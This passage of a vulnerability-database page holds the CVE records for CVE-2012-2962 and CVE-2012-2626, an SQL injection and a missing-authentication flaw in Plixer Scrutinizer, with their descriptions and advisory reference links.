| http://secunia.com/advisories/50052 | third-party-advisory, x_refsource_SECUNIA | |
| http://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf | x_refsource_CONFIRM | |
| http://www.securityfocus.com/bid/54625 | vdb-entry, x_refsource_BID | |
| http://www.exploit-db.com/exploits/20033 | exploit, x_refsource_EXPLOIT-DB | |
| http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html | x_refsource_CONFIRM | |
| http://www.kb.cert.org/vuls/id/404051 | third-party-advisory, x_refsource_CERT-VN | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/77148 | vdb-entry, x_refsource_XF |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T19:50:05.342Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "84232",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://www.osvdb.org/84232"
},
{
"name": "50052",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/50052"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf"
},
{
"name": "54625",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/54625"
},
{
"name": "20033",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "http://www.exploit-db.com/exploits/20033"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
},
{
"name": "VU#404051",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/404051"
},
{
"name": "scrutinizer-statusfilter-sql-injection(77148)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/77148"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2012-07-11T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "SQL injection vulnerability in d4d/statusFilter.php in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.2 allows remote authenticated users to execute arbitrary SQL commands via the q parameter."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-28T12:57:01",
"orgId": "37e5125f-f79b-445b-8fad-9564f167944b",
"shortName": "certcc"
},
"references": [
{
"name": "84232",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://www.osvdb.org/84232"
},
{
"name": "50052",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/50052"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf"
},
{
"name": "54625",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/54625"
},
{
"name": "20033",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "http://www.exploit-db.com/exploits/20033"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
},
{
"name": "VU#404051",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/404051"
},
{
"name": "scrutinizer-statusfilter-sql-injection(77148)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/77148"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cert@cert.org",
"ID": "CVE-2012-2962",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "SQL injection vulnerability in d4d/statusFilter.php in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.2 allows remote authenticated users to execute arbitrary SQL commands via the q parameter."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "84232",
"refsource": "OSVDB",
"url": "http://www.osvdb.org/84232"
},
{
"name": "50052",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/50052"
},
{
"name": "http://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf",
"refsource": "CONFIRM",
"url": "http://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf"
},
{
"name": "54625",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/54625"
},
{
"name": "20033",
"refsource": "EXPLOIT-DB",
"url": "http://www.exploit-db.com/exploits/20033"
},
{
"name": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html",
"refsource": "CONFIRM",
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
},
{
"name": "VU#404051",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/404051"
},
{
"name": "scrutinizer-statusfilter-sql-injection(77148)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/77148"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "37e5125f-f79b-445b-8fad-9564f167944b",
"assignerShortName": "certcc",
"cveId": "CVE-2012-2962",
"datePublished": "2012-07-30T22:00:00",
"dateReserved": "2012-05-30T00:00:00",
"dateUpdated": "2024-08-06T19:50:05.342Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2012-2626 (GCVE-0-2012-2626)
Vulnerability from cvelistv5
Published
2012-07-31 10:00
Modified
2024-09-16 16:28
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 does not require token authentication, which allows remote attackers to add administrative accounts via a userprefs action.
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt | x_refsource_MISC | |
| http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T19:42:31.460Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 does not require token authentication, which allows remote attackers to add administrative accounts via a userprefs action."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2012-07-31T10:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-2626",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 does not require token authentication, which allows remote attackers to add administrative accounts via a userprefs action."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt",
"refsource": "MISC",
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
},
{
"name": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html",
"refsource": "MISC",
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-2626",
"datePublished": "2012-07-31T10:00:00Z",
"dateReserved": "2012-05-11T00:00:00Z",
"dateUpdated": "2024-09-16T16:28:35.817Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}